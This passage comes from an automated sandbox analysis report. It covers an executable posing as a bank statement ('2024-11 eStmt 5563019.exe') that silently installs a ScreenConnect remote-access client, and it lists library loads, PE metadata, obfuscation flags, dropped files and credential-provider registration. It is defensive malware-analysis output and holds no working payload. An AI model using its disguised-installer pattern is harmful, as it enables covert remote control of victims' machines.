                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: certificate valid
                              Source: 2024-11 eStmt 5563019.exeStatic file information: File size 5474600 > 1048576
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x508600
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808027783.0000000000C00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808808896.0000000002581000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808367972.0000000000C72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1744657723.00000000002AD000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: 2024-11 eStmt 5563019.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdbol source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: 2024-11 eStmt 5563019.exe, MSI5684.tmp.2.dr, 6153c7.msi.2.dr, 6153c6.rbs.2.dr, MSI586B.tmp.2.dr, MSI56A4.tmp.2.dr, 6153c5.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 2024-11 eStmt 5563019.exe, MSI4E28.tmp.1.dr, 6153c7.msi.2.dr, 6153c5.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808118214.0000000000C32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808118214.0000000000C32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: 2024-11 eStmt 5563019.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: 2024-11 eStmt 5563019.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.0.2024-11 eStmt 5563019.exe.acccf8.2.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.2.2024-11 eStmt 5563019.exe.16b0000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: ScreenConnect.Client.dll.2.drStatic PE information: 0xA542AE52 [Sat Nov 10 09:37:22 2057 UTC]
                              Source: MSI4E28.tmp.1.drStatic PE information: real checksum: 0x2f213 should be: 0x10d04e
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: real checksum: 0x51e17b should be: 0x542799
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_05683870 push esp; iretd 0_2_05683871
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_044FE5B2 push eax; ret 7_2_044FE5D1
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7C4C1 push esp; ret 7_2_05E7C4D3
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7C460 pushad ; ret 7_2_05E7C473
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_061102C8 push eax; retf 7_2_061102C9
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_06110360 pushfd ; retf 7_2_06110361
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3483D3 pushad ; ret 8_2_00007FFD9B34845D
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B34845E push eax; ret 8_2_00007FFD9B34846D
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640B80 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640B70 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640B28 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640B18 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640B08 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B640AF8 push eax; ret 8_2_00007FFD9B640B99
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3383D3 pushad ; ret 9_2_00007FFD9B33845D
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B33845E push eax; ret 9_2_00007FFD9B33846D

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (d519fd2fdcfe66e7)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-4dc3-7acebcd60fe9}\inprocserver32
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4E28.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56A4.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dllJump to dropped file
